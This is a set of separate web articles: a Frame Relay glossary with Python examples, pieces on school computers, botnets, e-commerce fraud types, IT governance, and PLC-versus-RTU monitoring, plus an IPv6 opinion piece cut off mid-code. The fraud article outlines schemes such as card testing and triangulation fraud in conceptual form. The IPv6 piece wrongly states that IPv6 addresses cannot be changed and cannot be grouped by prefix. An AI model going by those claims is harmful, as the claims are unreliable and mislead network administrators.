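def measurement_interval_seconds(bc_bits: float, cir_bps: float) -> float:
    """Committed rate measurement interval Tc, in seconds, from Bc and CIR."""
    if cir_bps <= 0:
        raise ValueError("CIR must be a positive rate in bps")
    return bc_bits / cir_bps

# Bc = 64,000 committed bits per interval at CIR = 32,000 bps gives Tc = 2 s,
# the sliding window over which Bc (and Be-excess) data is measured.
print(measurement_interval_seconds(64_000, 32_000))  # 2.0
```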
cyclic redundancy check (CRC)—A computational means to ensure the accuracy of frames transmitted between devices in a Frame Relay network. The mathematical function is computed, before the frame is transmitted, at the originating device. Its numerical value is computed based on the content of the frame. This value is compared with a re-computed value of the function at the destination device. There is no limit to the size of the frame to which the CRC can be applied; when the frame length increases, however, so does the probability that an undetected error may occur. Frame Relay uses CRC-16, a 16-bit Frame Check Sequence (FCS) that will detect all types of bit errors for frames less than 4096 bytes in length. As the frames get larger, rare erroneous bit patterns can occur that the CRC-16 will not detect. See also “frame check sequence (FCS)” below.
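The error-detection idea can be illustrated with a minimal bitwise 16-bit CRC in the reflected HDLC/X.25 style. The parameters used here (polynomial 0x8408, initial value and final XOR of 0xFFFF) are an assumption for the sake of the sketch; this shows the principle, not a drop-in FCS routine for any particular Frame Relay implementation.

```python
# Minimal bitwise 16-bit CRC (assumed HDLC/X.25-style parameters: reflected
# polynomial 0x8408, init 0xFFFF, final XOR 0xFFFF), used here only to show
# how a frame check sequence detects bit errors.

def fcs16(data: bytes) -> int:
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc ^ 0xFFFF

frame = b"frame relay payload"
good = fcs16(frame)
corrupted = bytes([frame[0] ^ 0x01]) + frame[1:]  # flip a single bit
# Any single-bit error changes the CRC, so the receiver rejects the frame:
print(good != fcs16(corrupted))  # True
```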
data communications equipment (DCE)—Defined by both the Frame Relay and the X.25 committees, DCE applies to switching equipment and is distinguished from devices that attach to the network (DTE). See also “end device” below.
data-link connection identifier (DLCI)—A unique number assigned to a permanent virtual circuit (PVC) endpoint in a Frame Relay network. It identifies a particular PVC endpoint within a user’s access channel and has local significance only to that channel.
discard eligibility (DE)—A user-set bit indicating that a frame may be discarded in preference to other frames if congestion occurs, to maintain the committed quality of service within the network. The network side can also set the DE bit and, on congestion, will first drop frames that have this DE bit set. Frames with the DE bit set are considered “Be-excess” data. See also “excess burst size (Be)” below.
E1—Transmission rate of 2.048 Mbps on E1 communications lines. An E1 facility carries a 2.048 Mbps digital signal. See also “T1” below and “channel” above.
egress—Frame Relay frames which leave a Frame Relay network heading toward the destination device. Contrast with “ingress” below.
end device—The ultimate source or destination of data flowing through a Frame Relay network, sometimes referred to as Data Terminal Equipment (DTE). As a source device, it sends data to an interface device for encapsulation in a Frame Relay frame. As a destination device, it receives de-encapsulated data from the interface device (in other words, the Frame Relay frame is stripped off, leaving only the user’s data). An end device can be an application program or some operator-controlled device (for example, a workstation). In a LAN environment, the end device can be a file server or a host. See also “data communications equipment (DCE)” above.
encapsulation—A process by which an interface device places the protocol-specific frames of an end device inside a Frame Relay frame. The network accepts only those frames formatted specifically for Frame Relay; hence, devices acting as interfaces to a Frame Relay network must perform encapsulation. See also “interface device” or “Frame-Relay-capable interface device” below.
excess burst size (Be)—The maximum amount of uncommitted data (in bits) in excess of Bc that a Frame Relay network can attempt to deliver during a time interval Tc. Generally, Be data is delivered with a lower probability than Bc, and the network treats it as discard eligible. See also “committed burst size (Bc)” above.
file server—In the context of Frame Relay network supporting LAN-to-LAN communications, a device connecting a series of workstations within a given LAN. The device performs error recovery and flow control functions, as well as end-to-end acknowledgment of data during data transfer, thereby significantly reducing overhead within the Frame Relay network.
forward explicit congestion notification (FECN)—A bit sent in the same direction as the data flow. It is set by a Frame Relay network to notify an interface device (DTE) that congestion avoidance procedures should be initiated by the receiving device. See also “backward explicit congestion notification (BECN)” above.
frame check sequence (FCS)—A 16-bit field for the CRC used in High-Level Data Link Control (HDLC) and Frame Relay frames. The FCS is used to detect bit errors that may occur during transmission of the frame. The bits between the opening flag and the FCS are checked. See also “cyclic redundancy check (CRC)” above.
Frame-Relay-capable interface device—A communications device that performs encapsulation. Frame-Relay-capable routers and bridges are examples of interface devices used to interface the customer’s equipment to a Frame Relay network. See also “interface device” below and “encapsulation” above.
Frame Relay frame—A variable-length unit of data, in Frame Relay format, that is transmitted through a Frame Relay network as pure data. Contrast with “packet” below. See also “Q.922 Annex A (Q.992A)” below.
Frame Relay network—A telecommunications network based on Frame Relay technology. Data is statistically multiplexed. Contrast with “packet-switching network” below.
high-level data link control (HDLC)—A generic link-level communications protocol developed by the International Organization for Standardization (ISO). HDLC manages synchronous, code-transparent, serial information transfer over a link connection. See also “Synchronous Data Link Control (SDLC)” below.
hop—A single trunk line between two switches in a Frame Relay network. An established PVC consists of a certain number of hops, spanning the distance from the ingress access interface to the egress access interface within the network.
host computer—A communications device that enables users to run applications to perform such functions as text editing, program execution, access to databases, and so on.
ingress—Frame Relay frames heading from an access device toward the Frame Relay network. Contrast with “egress” above.
interface device—A device that provides the interface between the end device (or devices) and a Frame Relay network by encapsulating the user’s native protocol in Frame Relay frames and sending the frames across the Frame Relay backbone. See also “encapsulation” and “Frame-Relay-capable interface device” above.
International Telecommunication Union Telecommunication Standardization Sector (ITU-T)—A standards organization that devises and proposes recommendations for international communications. Formerly known as the Comité Consultatif International Télégraphique et Téléphonique (CCITT). See also “American National Standards Institute (ANSI)” above.
Link Access Procedure, Balanced (LAPB)—The balanced-mode, enhanced version of HDLC used in X.25 packet-switching networks. Contrast with “Link Access Procedure on the D-channel (LAPD)” below.
Link Access Procedure on the D-channel (LAPD)—A protocol that operates at the data-link layer (L2) of the OSI architecture. LAPD is used to convey information between Layer 3 (L3) entities across the Frame Relay network. The D-channel carries signaling information for circuit switching. Contrast with “Link Access Procedure, Balanced (LAPB)” above.
local area network (LAN)—A privately owned network that offers high-speed communications channels to connect information processing equipment in a limited geographic area.
LAN protocols—A range of LAN protocols supported by a Frame Relay network, including Transmission Control Protocol/Internet Protocol (TCP/IP), Apple Talk, Xerox Network System (XNS), Internetwork Packet Exchange (IPX), and Common Operating System used by DOS-based PCs.
LAN segment—In the context of a Frame Relay network supporting LAN-to-LAN communications, a LAN linked to another LAN by a bridge. Bridges enable two LANs to function like a single, large LAN by passing data from one LAN segment to another. To communicate with each other, the bridged LAN segments must use the same native protocol. See also “bridge” above.
Local Management Interface (LMI)—A set of enhancements to the basic Frame Relay specification. LMI includes support for a keepalive mechanism, which verifies that data is flowing, and for a status mechanism, which provides an on-going status report on the DLCIs known to the switch. There are three types of LMI: the Frame Relay Forum’s LMI, ANSI T1.617 (Annex D), and CCITT Q.922 (Annex A).
packet—A group of fixed-length binary digits—including the data and call control signals—that are transmitted as a composite whole through an X.25 packet-switching network. The data, call control signals, and possible error control information are arranged in a predetermined format. Packets do not always travel the same pathway; rather, they are arranged in proper sequence at the destination side before forwarding the complete message to an addressee. Contrast with “Frame Relay frame” above.
packet-switching network—A telecommunications network based on packet-switching technology, wherein a transmission channel is occupied only for the duration of the transmission of the packet. Contrast with “Frame Relay network” above.
parameter—A numerical code that controls an aspect of terminal or network operation, such aspects as page size, data transmission speed, and timing options.
permanent virtual circuit (PVC)—A Frame Relay logical link whose endpoints and class of service are defined by network management. Analogous to an X.25 permanent virtual circuit, a PVC consists of the originating Frame Relay network element address, originating data-link control identifier, terminating Frame Relay network element address, and termination data-link control identifier. “Originating” refers to the access interface from which the PVC is initiated. “Terminating” refers to the access interface at which the PVC stops. Many data network customers require a PVC between two points. DTE that needs continuous communication uses PVCs. See also “data-link connection identifier (DLCI)” above.
Q.922 Annex A (Q.922A)—The international draft standard, based on the Q.922A frame format developed by the ITU-T, that defines the structure of Frame Relay frames. All Frame Relay frames entering a Frame Relay network automatically conform to this structure. Contrast with “Link Access Procedure, Balanced (LAPB)” above.
Q.922A frame—A variable-length unit of data, formatted in Frame Relay (Q.922A) format, that is transmitted through a Frame Relay network as pure data (that is, it contains no flow control information). Contrast with “packet” above. See also “Frame Relay frame” above.
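The two-byte Q.922A address field can be decoded with a few bit operations. The sketch below is illustrative only, assuming the standard two-octet format (six high-order DLCI bits, C/R, and EA in the first octet; four low-order DLCI bits, FECN, BECN, DE, and EA in the second):

```python
def parse_q922a_header(b1: int, b2: int) -> dict:
    """Decode the two-byte Q.922A address field of a Frame Relay frame.

    Byte 1: DLCI high 6 bits | C/R | EA=0
    Byte 2: DLCI low 4 bits | FECN | BECN | DE | EA=1
    """
    dlci = ((b1 >> 2) & 0x3F) << 4 | ((b2 >> 4) & 0x0F)
    return {
        "dlci": dlci,            # 10-bit data-link connection identifier
        "cr":   (b1 >> 1) & 1,   # command/response bit
        "fecn": (b2 >> 3) & 1,   # forward explicit congestion notification
        "becn": (b2 >> 2) & 1,   # backward explicit congestion notification
        "de":   (b2 >> 1) & 1,   # discard eligibility
    }

# DLCI 100: high 6 bits = 0b000110, low 4 bits = 0b0100
hdr = parse_q922a_header(0b00011000, 0b01000001)
print(hdr["dlci"])  # 100
```

Note how the DLCI is split across both octets, which is why the statistical multiplexing entry below can speak of interleaving traffic by DLCI: the switch only needs these two bytes to demultiplex frames.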
router—A device that supports LAN-to-LAN communications. Routers may be equipped to provide Frame Relay support to the LAN devices they serve. A Frame-Relay-capable router encapsulates LAN frames in Frame Relay frames and feeds those Frame Relay frames to a Frame Relay switch for transmission across the network. A Frame-Relay-capable router also receives Frame Relay frames from the network, strips the Frame Relay frame off each frame to produce the original LAN frame, and passes the LAN frame on to the end device. Routers connect multiple LAN segments to each other or to a WAN. Routers route traffic on the L3 LAN protocol (for example, the IP address). See also “bridge” above.
statistical multiplexing—A method of interleaving the data input of two or more devices on a single channel or access line for transmission through a Frame Relay network. Interleaving of data is accomplished using the DLCI.
switched virtual circuit (SVC)—A virtual circuit that is dynamically established on demand and is torn down when transmission is complete. SVCs are used in situations where data transmission is sporadic. Called a switched virtual connection in ATM terminology.
Synchronous Data Link Control (SDLC)—A link-level communications protocol used in an International Business Machines (IBM) Systems Network Architecture (SNA) network which manages synchronous, code-transparent, serial information transfer over a link connection. SDLC is a subset of the more generic HDLC protocol developed by the ISO.
T1—Transmission rate of 1.544 Mbps on T1 communications lines. A T1 facility carries a 1.544 Mbps digital signal. Also referred to as digital signal level 1 (DS-1). See also “E1” and “channel” above.
trunk line—A communications line connecting two Frame Relay switches to each other. | <urn:uuid:bacb694d-7310-4502-8aa1-7ea0822f0474> | CC-MAIN-2022-40 | https://www.cisco.com/c/en/us/support/docs/wan/frame-relay/47202-87.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00354.warc.gz | en | 0.87042 | 4,206 | 3.15625 | 3 |
As schools across the nation seek to integrate classroom computers within traditional lessons, institutions in Florida are facing new standards to accelerate the process. Officials have placed a deadline for the state's schools which requires that half of classroom materials must be presented on a digital platform by the fall of 2015.
This is causing considerable stress for educators in Florida, as they struggle to deploy classroom technologies in a way that is meaningful and benefits the lesson at hand as well as overall student learning. However, during the implementation process, there are a few challenges that must be addressed for successful utilization of classroom computers.
Challenge #1: Technology for technology's sake
Many schools, even those not required to do so by state lawmakers, are attracted by the prospects that technology, including classroom computers, smartboards and other systems, can offer. Experts recommend considering what issues the hardware might solve for the school, as well as what value the systems add in comparison to alternative arrangements. By considering these aspects, devices can be deployed for reasons beyond the "wow-factor" of today's technological tools.
Challenge #2: Funding
Another issue to be faced by educators and administrators is funding. Especially within a 1:1 initiative, classroom computers can be very expensive. Establishing monetary backing for these systems can be difficult if decision makers are unsure where to look. However, state and local programs, including those tied to the Children's Internet Protection Act, can provide capital for connectivity and other hardware if schools meet the requirements. Administrators need to explore their available options to see what assistance they may be able to obtain.
Challenge #3: Hesitation to migration
Whenever a new system is integrated, some individuals may be hesitant about such changes. The same is true for classroom technologies. It can be somewhat difficult for teachers, especially those less familiar with connected systems and Internet resources, to shift their lesson plans to include the hardware. However, with a little training before the classroom computers are introduced to students, educators can feel more comfortable and help pupils get used to the new systems.
Challenge #4: Student distractions
Another obstacle to address with the use of classroom computers is student distractions. When pupils work individually on projects, they can be tempted to stray from the assignment to surf the Web or visit social media sites. Classroom management software can help prevent this issue by providing better oversight of technological assets and ensuring that students are utilizing them properly.
Hundreds of billions of dollars' worth of banking transactions take place online every day, and protecting these transactions from hackers and other cyber threats has become a booming industry.
If your computer doesn’t have antivirus software and a firewall, then there is a good chance your computer might be infected with a virus or a Trojan horse.
Hackers employ different strategies to steal your data and it includes but is not limited to credit card details, banking details, social security numbers, and email and social network credentials.
One of the most prevalent hacking methods is the botnet, and, most of the time, the infected party doesn't even know they are infected. The botnet's creator remotely controls a set of software robots that infect computers; the infected machines are known as zombies.
In 2010, an FBI investigation detected a cybercriminal ring that created a botnet called Zeus and used it to steal $70 million from different bank accounts in the United States.
A sudden increase in traffic, unauthorized connection attempts to command and communication servers, slow computing, using lots of CPU resources, an inability to access the internet, and getting messages from unidentified sources are some of the ways to detect botnets. Using anti-botnet tools, installing software patches, and regularly monitoring network traffic are some of the prevention methods.
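A sudden traffic increase is easiest to spot against a rolling baseline. The sketch below is a minimal illustration of that idea, not a production detector; the window size and spike factor are arbitrary assumptions:

```python
from collections import deque

def traffic_spike(counts, window=5, factor=3.0):
    """Flag minutes whose outbound-connection count exceeds `factor` times
    the average of the preceding `window` minutes -- the kind of sudden
    traffic increase that can indicate botnet activity.

    `counts` is a list of per-minute connection counts; the thresholds
    here are illustrative, not tuned values.
    """
    recent = deque(maxlen=window)
    spikes = []
    for minute, count in enumerate(counts):
        if len(recent) == window:
            baseline = sum(recent) / window
            if baseline > 0 and count > factor * baseline:
                spikes.append(minute)
        recent.append(count)
    return spikes

print(traffic_spike([10, 12, 9, 11, 10, 95, 12]))  # [5]
```

In practice a real anti-botnet tool would also correlate such spikes with destination addresses and known command-and-control indicators, but the baseline-versus-spike comparison is the core idea.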
Hackers gain unauthorized access to steal valuable information and may use this data to harm you in a personal or financial capacity. Most recently, hackers attacked KICKICO, a cryptocurrency trading exchange platform, gaining access to its servers to steal $7.7 million worth tokens. This is not the first time hackers attacked a cryptocurrency trading exchange and caused a lot of financial damage to the companies.
Many guides are available on the internet to help customers transact in a secure environment, and CoinList provides one such guide on how to buy bitcoin gold.
Common Methods of Cyber threats Infection
One of the most common ways to infect and damage a computer is malware. The term is short for ‘malicious software’, and it can refer to a virus, Trojan horse, worm, adware, and/or spyware. The best way to detect and prevent these threats is to use anti-malware software tools and protect your systems from being infected.
Another method involved in stealing data is phishing, and cybercriminals use this method more often as it takes little effort to deploy on target computers to produce results. Cybercriminals create fake emails, websites, and text messages that look like they’re from authenticated companies to make people part with their personal and financial information.
Cybercriminals use this data to cause financial damage to the targeted person or an entity. Always check the credentials of the website you are visiting and do not open emails from unknown sources.
It is better to take precautions and take assertive steps to prevent and protect your computer systems from malicious attacks and cyber threats.
E-commerce revenue is constantly increasing, but the number of fraud cases, as well as the percentage of fraud in online transactions, is increasing faster still. But what types of fraud exist and—more importantly—how can we protect ourselves against them?
The Nilson Report (1) uses the example of card-based payments to illustrate the point: Internet payment fraud is constantly increasing, and is, apparently, unstoppable. While the increase itself is nothing new (there has been more e-commerce fraud every year since 1993), the rate is impressive. The number of fraud cases increased by 19 percent compared to 2013, and this is the fourth successive time that fraud growth has exceeded e-commerce growth. Out of every 100 USD in turnover, fraudsters currently snatch 5.65 cents.
Fraud is not exclusive to credit card payments, however. Criminals are becoming more sophisticated in their use of malware to capture online banking logins via phones, tablets and computers, using the stolen bank account details to make fraudulent payments. “Alternative” payment methods are also attracting criminals. So what does this fraud look like, exactly? A study (2) asked 274 merchants from various industries in six countries precisely this question. The most common types of fraud are explained below.
According to the study (2), the most common types of fraud causing concern among merchants are identity theft (71 percent), phishing (66 percent) and account theft (63 percent). Here, credit cards are the most popular target, as a fraudster does not need much to carry out a “card not present” transaction.
In traditional identity theft, the criminals’ goal is to carry out transactions using a different identity. Instead of having to come up with a completely new identity to do this, they simply take over an existing one. This is easier to do—and usually much faster.
In order to commit identity theft or appropriate someone’s identity, fraudsters target personal information, such as names, addresses and email addresses, as well as credit card or account information. This enables them, for example, to order items online under a false name and pay using someone else’s credit card information or by debiting another person’s account. Phishing, on the other hand, simply involves using fraudulent websites, emails or text messages to access personal data. Another technical method is known as pharming, in which manipulated browsers direct unsuspecting customers to fraudulent websites. Often, all that is required to appropriate someone’s identity is a stolen password. This can be used to take over an existing account with an online shop – in most cases, the payment data is already stored in the account.
Of course, hacker attacks on e-commerce providers and stealing customer data also fall under this fraud category, as does using malware on computers to commit identity theft by spying out sensitive data. “Man-in-the-middle attacks” are even more sophisticated. These involve hackers muscling in on communications between customers and merchants (or between customers and banks) in order to siphon off login data.
We haven’t even mentioned the opportunities involved in intercepting credit cards sent by mail, for example, or in copying credit cards in restaurants and hotels or at cash machines. Already, though, the true extent of the identity theft problem is apparent.
In fourth place is what the merchants surveyed (2) refer to as “friendly fraud”. This sounds friendlier than it really is: using this method, customers order goods or services and pay for them – preferably using a “pull” payment method like a credit card or direct debit. Then, however, they deliberately initiate a chargeback, claiming that their credit card or account details were stolen. They are reimbursed—but they keep the goods or services. This fraud method is particularly prevalent with services, such as those in the gambling or adult milieus. Friendly fraud also tends to be combined with re-shipping. This is where criminals who use stolen payment data to pay for their purchases don’t want to have them sent to their home addresses. Instead, they use middlemen whose details are used to make the purchases and who then forward the goods.
Clean fraud’s name is misleading, because there’s nothing clean about it. The basic principle of clean fraud is that a stolen credit card is used to make a purchase, but the transaction is then manipulated in such a way that fraud detection functions are circumvented. Much more know-how is required here than with friendly fraud, where the only goal is to cancel the payment once a purchase has been made. In clean fraud, criminals use sound analyses of the fraud detection systems deployed, plus a great deal of knowledge about the rightful owners of their stolen credit cards. A great deal of correct information is then entered during the payment process so that the fraud detection solution is fooled. Before clean fraud is committed, card testing is often carried out. This involves making cheap test purchases online to check that the stolen credit card data works.
There are two variations of affiliate fraud, both of which have the same aim: to glean more money from an affiliate program by manipulating traffic or signup statistics. This can be done either using a fully automated process or by getting real people to log into merchants’ sites using fake accounts. This type of fraud is payment-method-neutral, but extremely widely distributed.
During triangulation fraud, the fraud is carried out via three points. The first is a fake online storefront, which offers high-demand goods at extremely low prices. In most cases, additional bait is added, like the information that the goods will only be shipped immediately if the goods are paid for using a credit card. The falsified shop collects address and credit card data – this is its only purpose. The second corner of the fraud triangle involves using other stolen credit card data and the name collected to order goods at a real store and ship them to the original customer. The third point in the fraud triangle involves using the stolen credit card data to make additional purchases. The order data and credit card numbers are now almost impossible to connect, so the fraud usually remains undiscovered for a longer period of time, resulting in greater damages.
Merchant fraud is another method which must be mentioned. It’s very simple: goods are offered at cheap prices, but are never shipped. The payments are, of course, kept. This method of fraud also exists in wholesale. It is not specific to any particular payment method, but this is, of course, where no-chargeback payment methods (most of the push payment types) come into their own.
More International Fraud
On average, the merchants who participated in the study (2) do business in 14 countries. According to 58 percent of those surveyed, the major challenge in fraud prevention is a lack of system integration to provide a unified view of all their transactions across all markets. 52 percent also see increased international transactions as a challenge. Almost exactly the same number (51 percent) have great difficulty in maintaining an overview of the various fraud prevention tools in different countries. Language barriers, as well as the difficulty of keeping international tabs on individual customers, pose additional fraud management challenges.
Fraud methods vary depending on the sales channel, and the fact that most merchants aim to achieve multi-channel sales does not make the situation any easier. According to 69 percent of the merchants surveyed in (2), sales via third-party websites like Amazon, Alibaba or eBay are particularly susceptible to fraud. These are followed by mobile sales (mentioned by 64 percent) and sales via their own online shops (55 percent). | <urn:uuid:0e104292-413e-43b9-8d76-ac2a8591528e> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/articles/types-fraud-e-commerce/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00554.warc.gz | en | 0.94894 | 1,590 | 2.796875 | 3 |
Establishing strong IT governance is essential for any organization that uses IT. To be successful, the role of IT governance in an organization must be clearly defined. Depending on the organization’s size, this governance might be done by a whole team or by a single individual. Whichever organizational model you choose to implement, the scope of the IT governance roles and responsibilities must cover all aspects of the necessary governance. This article will take a look at IT governance responsibilities and the IT governance roles commonly seen in organizations.
IT governance responsibilities vs IT management responsibilities
There is often confusion both inside and outside of IT about the differences between governance and management. Management and governance are not the same thing and have different responsibilities. To understand these differences, let us take a look at the responsibilities of each of them.
Henri Fayol defined these responsibilities of management in his 1916 book ‘Administration Industrielle et Generale’:
- to forecast and plan
- to organize
- to command or direct
- to coordinate
- to control (In the sense that a manager must receive feedback about a process in order to make necessary adjustments and must analyze any variance)
Management is primarily concerned with maintaining the daily operations of the business. Within IT, these management responsibilities focus on the day-to-day operation of IT. For example: Planning new software releases, organizing support rotas, and telling a development team what to work on next. Good IT management doesn’t automatically lead to effective IT governance, but it can enable it.
Governance is concerned with using and regulating influence to direct and control the actions and affairs of management and others. The person or group with responsibility for governance is accountable for the performance and conformance of the organization. The IT governance team roles and responsibilities in any organization should include the design, implementation, and ongoing compliance with these five responsibilities of IT governance:
- Determine the objectives for IT. These objectives define the purpose of IT and describe how the purpose will be fulfilled. They should be included in any IT vision or mission statements and implemented using a strategic IT plan.
- Design and implement the IT governance framework. The framework includes the objectives for IT, governance principles, policies, IT governance roles and responsibilities, and processes. The framework must be aligned with the organization’s wider governance responsibilities and support the achievement of the company’s goals and strategic objectives. Frameworks should, wherever possible, attempt to utilize industry standards and best practices such as COBIT. The framework should be regularly reviewed and updated as required.
- Define the ethics of the IT organization. Ethics are based on morals and values. They define the rules or standards that will shape how IT staff at all levels conduct themselves within the organization and what behaviors are expected from them.
- Create the culture of the IT organization. The culture drives how IT staff interact with each other and with those outside IT. IT governance is unlikely to be successful unless this governance responsibility is taken seriously. Cultural change does not just happen; it has to be led and nurtured by those at the top of IT. The willingness of people to be ‘governed’ and to support the IT governance system is at the heart of an effective governance culture.
- Ensure compliance. This is an ongoing governance responsibility. It aims to ensure that IT continually meets any regulatory, statutory, and legal obligations; supports the organization’s objectives while working within the defined ethical and cultural framework; and follows the IT governance framework. Compliance also includes checking that the IT governance roles and responsibilities are still relevant.
IT governance roles
To ensure the efficient governance of IT, roles should be defined that include appropriate governance responsibilities. IT management’s task is to achieve the objectives of the organization, working within the defined ethical and cultural framework, complying with the governance ‘rules’, and providing assurance back to the governing body that this is being accomplished.
The IT governance roles and responsibilities should be defined in the governance framework and should include a definition of the levels of authority and responsibility given to each role. There are typically four levels of IT governance roles. Each has a distinct purpose with a specific level of authority for decisions that can be made at that level.
The highest level with IT governance responsibilities is Strategic. This level of governance primarily focuses on the alignment between the IT strategy and the business strategy. This governance role is typically provided by a group of senior executives from across the business, including the CIO. This group sets the vision for where the business is going and how IT is expected to help it get there.
The next level of IT governance roles is the Executive level. This is also typically provided by a group drawn from across the business but at the next level down in the organization. This group is responsible for the prioritization of all IT projects, allocating resources, and ensuring the achievement of the business benefits. The CIO normally chairs this body.
The third layer that contributes to the role of IT governance in an organization has two parts: Program governance and Business process governance. Program governance oversees the delivery of specific IT projects. They deal with escalated project issues, organizational change management, and benefits realization. They are typically formed on an ad-hoc basis for a specific project or group of related projects and are disbanded when the project is closed.
The business process governance role is responsible for how organization-wide processes involving IT are executed and amended.
The lowest level of IT governance roles is the Operations layer. This layer typically sits within the operational IT service management functions, concentrating on the governance of incidents, problems, and approving change requests. An example of an IT governance role in this layer is a Change Advisory Board with responsibility for the governance of changes to IT systems.
The primary objective for all IT governance roles and responsibilities is to ensure that policies and strategies are designed and applied so that IT helps the business to meet its objectives. Irrespective of how specific responsibilities are allocated to roles or how the individual roles are organized, it is important to keep a constant focus on this primary objective. | <urn:uuid:ee1de1fa-6e69-4df1-b554-c0d532160a73> | CC-MAIN-2022-40 | https://itchronicles.com/governance/it-governance-roles-responsibilities/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00554.warc.gz | en | 0.942847 | 1,244 | 2.5625 | 3 |
A PLC (Programmable Logic Controller) device is a small computer used in Supervisory Control and Data Acquisition (SCADA) systems. They provide data and control access to industrial automated processes.
Think about the brain controlling a finger on a light switch. The brain is the PLC, the finger is the equipment at a facility, and the act of turning on and off a switch is the control of inputs and outputs in industrial process.
PLCs can bring many benefits to your company, however, their many downsides are making network managers migrate to more efficient control solutions.
Let's take a look at the downsides of PLCs and a cost-efficient alternative to this device.
The first thing you need to take into consideration when evaluating your decision to replace your PLCs is what kinds of pain points they are currently causing you. The common issues network operators face are:
PLC systems are highly customizable. This won't be a disadvantage if you (or someone on your staff) have strong programming skills, but if you don't know how to program (or don't have the time), this can be a real deal-breaker.
PLCs are mostly suited only to manufacturing environments. This can be a problem if your network is growing and you now find yourself having to monitor equipment at multiple distant sites.
If you have telecom equipment that you need to monitor and control, you know that its environment is often harsh. PLCs are simply not designed to give you the high reliability needed to endure extreme conditions.
Of course, there are no guarantees that your particular network will be better off without PLCs.
However, if your PLCs are at the end of their operational life and if you identify yourself with these main issues, maybe it's time to migrate to a more rugged device.
If you think that is time to invest in a more rugged solution for your SCADA system, then it's time for you to take a deeper look at Remote Telemetry/Terminal Units (RTUs).
RTUs are devices designed to be deployed at remote sites to monitor and report events occurring there. They are often used as a cost-effective alternative to PLCs, as they provide the same level of information and automation at remote facilities.
Some of the advantages of implementing RTUs include:
When compared to a PLC, an RTU is more "heavy-duty". RTUs have more monitoring and control capacity than PLCs, so they are superior when it comes to monitoring and controlling many different devices.
They come programmed by the manufacturer, so how well you can program is not a problem here. If you have new employees, training them will be easier and faster. Keep in mind, though, that if you need a custom design to attend specific needs, simply look for a vertical-integrated company that can develop a custom-fit solution for your requirements.
Also, RTUs can control multiple processes, even without the direct intervention of a master station, including networking, communications, and transportation processes.
RTUs are better suited to use across wider geographical areas due to their wireless communication capabilities.
When choosing the right RTU for your network, it's important to take into consideration your current needs and future goals. When you buy a device that not only supports your present requirements but can expand to accommodate future goals, your investment goes a long way.
Other than this important aspect, there are five essential features to look for when shopping for an RTU:
Many common site problems - from power outages to high-temperature alarms - can be solved by quickly turning on a device such as a generator or an air conditioner. Control relays allow you to remotely operate the equipment at your remote sites, which helps you eliminate expensive truck rolls.
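The automation described above amounts to simple threshold rules that map sensor readings to relay commands. The sketch below illustrates the idea; the sensor and relay names are hypothetical, since real RTUs expose vendor-specific point labels:

```python
def plan_relay_actions(readings, thresholds):
    """Decide which control relays to operate based on site sensor readings.

    `readings` and `thresholds` map sensor names to values; returns a list
    of (relay, action) commands. Names and thresholds are illustrative.
    """
    actions = []
    # High-temperature alarm: latch the air conditioner relay on.
    if readings.get("temperature_f", 0) > thresholds.get("temperature_f", 85):
        actions.append(("air_conditioner", "on"))
    # Commercial power lost (0 = utility power down): start the generator.
    if readings.get("commercial_power", 1) == 0:
        actions.append(("generator", "on"))
    return actions

print(plan_relay_actions({"temperature_f": 92, "commercial_power": 0},
                         {"temperature_f": 85}))
# [('air_conditioner', 'on'), ('generator', 'on')]
```

Rules like these are exactly what lets an RTU respond to a site problem in seconds instead of waiting for a technician to drive out.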
Detailed alarm notifications
Make sure your RTU device is able to give you detailed, informative information about your site situation. If your RTU includes diagnostic information in each alarm, that's even better. This way, you will be able to make informed decisions in a timely manner in case of an emergency.
It's safe to say that all your network techs and operators know how to use a web browser. An RTU with a web interface ensures that all your techs and operators can access your remote monitoring system from any computer, at any location.
Redundant backup communication
Backup serial ports or even internal modems are a great alternative to keep your monitoring system online even during a LAN failure.
Redundant backup power inputs
Having dual power inputs and battery backup keeps monitoring online even during power failures. Having both redundant backup communication and redundant backup power inputs gives you visibility over your network no matter what.
You might need to replace PLCs due to age. You also might decide that an RTU with built-in functions is a way to handle the retirement wave that's sweeping through many different industries. As new employees join the company, they'll have a much easier time with an RTU that doesn't require traditional programming. You can have a smaller, less-trained team and still manage your large and growing network.
The goal here is to protect yourself with increasing levels of automation. You and a core team of experts should design the system that's incredibly easy for your newer users to understand and manage.
Don't go blindly forward when you're thinking about replacing PLCs. Talk to experts (and find more than one). Look for a company that can do some of the customizations you would have otherwise programmed yourself - and also include tech support and a user manual to really make sure you have a system your future teams can handle for 10 years or more.
Start your vendor search by contacting us today.
Several years ago, I wrote an article explaining how there is plenty of address space with IPv4 and that the IPv6 hype had some merit, but most of it was being used as another push to scare organizations into buying a bunch of equipment they may not need.
It turns out that I was mostly correct.
How do I know this? We are regularly inside customer networks doing upgrades and support. Yes, we do see a smattering of IPv6 traffic in their logs, but it generally does not originate from their users, and at most it is a fraction of a percent. Basically, this means that their old IPv4 equipment probably would still suffice without upgrades had they gone that route.
Back in 2012, the sky was falling: everything needed to be converted over to IPv6 to save the Internet from locking up due to lack of address space. There may be elements of the Internet where that was true, but such dire predictions did not pan out in the enterprise. Why?
Lack of control over their private address space with IPv6.
For example, one of the supposed benefits of IPv6 addressing is that addresses can be assigned to a device at the factory; there are so many available that they are practically infinite. The problem for an IT professional managing a network is that you can’t change that IPv6 address (as far as I know), and that is where the breakdown begins.
In private organizations, the IT department wants to manage bandwidth and security permissions. Although managing security and permissions is possible with IPv6, you lose the orderliness of an IPv4 address space.
For example, there is no easy shorthand notation with IPv6 to do something like:
“Block the address range 192.168.1.0/24 from accessing a database server”.
With IPv4, the admin typically assigns IP addresses to different groups of people within the enterprise and then they can go back and make a general rule for all those users with one stroke of the pen (keyboard).
With IPv6, the admin has no control over the IP addresses, and would need to look them up, or come up with some other validation scheme, to set such permissions.
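That orderliness is easy to demonstrate with Python's standard `ipaddress` module (the addresses below are illustrative, not from any real deployment):

```python
import ipaddress

# IPv4: the admin assigns machines into a tidy CIDR block, so one
# membership test (or one firewall rule) covers the whole group
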